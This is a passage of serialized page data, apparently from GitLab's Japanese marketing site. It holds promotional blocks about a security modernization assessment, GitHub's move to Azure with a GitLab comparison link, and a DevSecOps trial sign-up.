score",{"href":798,"dataGaName":776,"dataGaLocation":254},"/assessments/security-modernization-assessment/",{"config":800},{"src":801},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":803,"paths":804,"header":807,"text":808,"button":809,"image":814},"github-azure-migration",[805,806],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Is your team ready for GitHub's Azure move?","GitHub is already rebuilding around Azure. Find out what it means for you.",{"text":810,"config":811},"See how GitLab compares to GitHub",{"href":812,"dataGaName":813,"dataGaLocation":254},"/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":815},{"src":790},{"header":817,"blurb":818,"button":819,"secondaryButton":823},"今すぐ開発をスピードアップ","DevSecOpsに特化したインテリジェントオーケストレーションプラットフォームで実現できることをご確認ください。\n",{"text":48,"config":820},{"href":821,"dataGaName":51,"dataGaLocation":822},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/ja-jp/","feature",{"text":53,"config":824},{"href":55,"dataGaName":56,"dataGaLocation":822},1777934853824]